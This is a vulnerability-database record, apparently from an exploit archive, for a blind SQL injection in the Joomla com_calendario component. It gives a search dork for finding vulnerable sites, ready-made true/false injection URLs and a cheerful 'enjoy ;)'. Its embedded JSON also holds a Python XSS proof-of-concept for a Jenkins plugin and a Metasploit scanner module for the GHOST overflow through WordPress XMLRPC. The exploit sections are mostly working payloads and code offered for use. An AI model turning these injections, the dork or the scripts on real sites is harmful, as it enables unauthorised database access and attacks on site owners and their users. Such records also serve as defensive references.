ID 1337DAY-ID-10475
Type zdt
Reporter Mr.tro0oqy
Modified 2009-12-28T00:00:00
Description
Exploit for unknown platform in category web applications
=================================================================
Joomla Component com_calendario Blind SQL injection Vulnerability
=================================================================
dork: inurl:index.php?option=com_calendario
exp :
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
enjoy ;)
# 0day.today [2018-04-13] #
{"published": "2009-12-28T00:00:00", "id": "1337DAY-ID-10475", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T04:09:25", "bulletin": {"published": "2009-12-28T00:00:00", "id": "1337DAY-ID-10475", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.8, "modified": "2016-04-19T04:09:25", "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C/"}}, "hash": "49f143972c0bf66d353a9379fe5bf6aac1c174e0a1ba0267163127f0e2c2bbdd", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T04:09:25", "edition": 1, "title": "Joomla Component com_calendario Blind SQL injection Vulnerability", "href": "http://0day.today/exploit/description/10475", "modified": "2009-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/10475", "references": [], "reporter": "Mr.tro0oqy", "sourceData": "=================================================================\r\nJoomla Component com_calendario Blind SQL injection Vulnerability\r\n=================================================================\r\n\r\ndork: inurl:index.php?option=com_calendario\r\n \r\n \r\nexp :\r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true\r\n \r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false\r\n \r\n \r\nenjoy ;)\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a07def2dc7c1facbdc241666f1853a32", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "795b612fe6caf7ee070c9a65b9733127", "key": "sourceData"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "743c843fae9a6b43e91cd20838bcc1ce", "key": "title"}, {"hash": "b830a4e55627eea4a40db0974801f8e7", "key": "sourceHref"}, {"hash": "162fc043ec12cc84096f739c8d5b806c", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "d01083a754211eb76909852ed4695a790cecc39315285383af6165e2d087124f", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-13T01:47:14"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10475", "SECURITYVULNS:VULN:5496"]}, {"type": "joomla", "idList": ["JOOMLA-297"]}], "modified": "2018-04-13T01:47:14"}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-04-13T01:47:14", "edition": 2, "title": "Joomla Component com_calendario Blind SQL injection Vulnerability", "href": "https://0day.today/exploit/description/10475", "modified": "2009-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/10475", "references": [], "reporter": "Mr.tro0oqy", "sourceData": "=================================================================\r\nJoomla Component com_calendario Blind SQL injection Vulnerability\r\n=================================================================\r\n\r\ndork: inurl:index.php?option=com_calendario\r\n \r\n \r\nexp :\r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true\r\n \r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false\r\n \r\n \r\nenjoy ;)\r\n\r\n\r\n\n# 0day.today [2018-04-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ebe37ded7e29bf1602949162b6245d8f", "key": "href"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "modified"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "162fc043ec12cc84096f739c8d5b806c", "key": "reporter"}, {"hash": "ceb3da58fdf0b848784c133dd008f46d", "key": "sourceData"}, {"hash": "82abbafc2b0108bbe9d710dd1a57a9bd", "key": "sourceHref"}, {"hash": "743c843fae9a6b43e91cd20838bcc1ce", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-12-04T12:01:20", "bulletinFamily": "exploit", "description": "Exploit for java platform in category web applications", "modified": "2019-11-08T00:00:00", "published": "2019-11-08T00:00:00", "id": "1337DAY-ID-33470", "href": "https://0day.today/exploit/description/33470", "title": "Jenkins build-metrics plugin 1.3 - (label) Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting\r\n# Exploit Author: vesche (Austin Jackson)\r\n# Vendor Homepage: https://plugins.jenkins.io/build-metrics\r\n# Version: Jenkins build-metrics plugin 1.3 and below\r\n# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3\r\n# CVE: CVE-2019-10475\r\n# Write-up: https://github.com/vesche/CVE-2019-10475\r\n\r\n#!/usr/bin/env python\r\n\r\nimport sys\r\nimport argparse\r\n\r\nVULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''\r\n\r\n\r\ndef get_parser():\r\n parser = argparse.ArgumentParser(description='CVE-2019-10475')\r\n parser.add_argument('-p', '--port', help='port', default=80, type=int)\r\n parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)\r\n parser.add_argument('-i', '--inject', help='inject', default='<script>alert(\"CVE-2019-10475\")</script>', type=str)\r\n return parser\r\n\r\n\r\ndef main():\r\n parser = get_parser()\r\n args = vars(parser.parse_args())\r\n port = args['port']\r\n domain = args['domain']\r\n inject = args['inject']\r\n if port == 80:\r\n base_url = f'http://{domain}'\r\n elif port == 443:\r\n base_url = f'https://{domain}'\r\n else:\r\n base_url = f'http://{domain}:{port}'\r\n build_url = VULN_URL.format(base_url=base_url, inject=inject)\r\n print(build_url)\r\n return 0\r\n\r\n\r\nif __name__ == '__main__':\r\n sys.exit(main())\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33470"}], "metasploit": [{"lastseen": "2019-12-12T14:33:09", "bulletinFamily": "exploit", "description": "This module can be used to determine hosts vulnerable to the GHOST vulnerability via a call to the WordPress XMLRPC interface. If the target is vulnerable, the system will segfault and return a server error. On patched systems, a normal XMLRPC error is returned.\n", "modified": "2017-07-24T13:26:21", "published": "2015-01-30T14:29:51", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "href": "", "type": "metasploit", "title": "WordPress XMLRPC GHOST Vulnerability Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress XMLRPC GHOST Vulnerability Scanner',\n 'Description' => %q{\n This module can be used to determine hosts vulnerable to the GHOST vulnerability via\n a call to the WordPress XMLRPC interface. If the target is vulnerable, the system\n will segfault and return a server error. On patched systems, a normal XMLRPC error\n is returned.\n },\n 'Author' =>\n [\n 'Robert Rowley',\n 'Christophe De La Fuente' ,\n 'Chaim Sanders' ,\n 'Felipe Costa' ,\n 'Jonathan Claudius' ,\n 'Karl Sigler' ,\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-0235' ],\n [ 'URL', 'http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html'],\n [ 'URL', 'http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']\n ]\n ))\n\n register_options(\n [\n OptInt.new('LENGTH', [false, 'Payload length', 2500]),\n ])\n end\n\n def length\n datastore['LENGTH']\n end\n\n def run_host(ip)\n unless wordpress_and_online?\n print_error(\"Looks like this site is no WordPress blog\")\n return\n end\n\n unless wordpress_xmlrpc_enabled?\n print_error(\"XMLRPC interface is not enabled\")\n return\n end\n\n ghost = \"0\" * length\n payload = \"http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php\"\n xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)\n\n res = send_request_cgi(\n 'uri' => wordpress_url_xmlrpc,\n 'method' => 'POST',\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => xml\n )\n\n if res.nil? || res.code == 500\n print_good(\"vulnerable to GHOST\")\n report_vuln(\n :host => ip,\n :proto => 'tcp',\n :port => datastore['RPORT'],\n :name => self.name,\n :info => \"Module #{self.fullname} found GHOST vulnerability\",\n :sname => datastore['SSL'] ? \"https\" : \"http\"\n )\n else\n print_status(\"target not vulnerable to GHOST\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "BASES directory contains executable files and has weak security permissions.", "modified": "2009-12-16T00:00:00", "published": "2009-12-16T00:00:00", "id": "SECURITYVULNS:VULN:10475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10475", "title": "Kaspersky Lab Multiple products privilege escalation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "NAt feature DoS, sys_get_thread_area() kernel memory content leak, ip_vs_conn_flush() race conditions, Posix timers DoS, rose_rt_ioctl() DoS.", "modified": "2005-12-01T00:00:00", "published": "2005-12-01T00:00:00", "id": "SECURITYVULNS:VULN:5496", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5496", "title": "Multiple linux kernels vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "joomla": [{"lastseen": "2019-04-13T18:54:33", "bulletinFamily": "software", "description": "Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel.\n", "modified": "2009-06-02T00:00:00", "published": "2009-06-02T00:00:00", "href": "https://developer.joomla.org/security-centre/297-20090602-core-frontend-xss.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-297", "type": "joomla", "title": "[20090603] - Core - Frontend XSS", "cvss": {"score": 0.0, "vector": "NONE"}}]}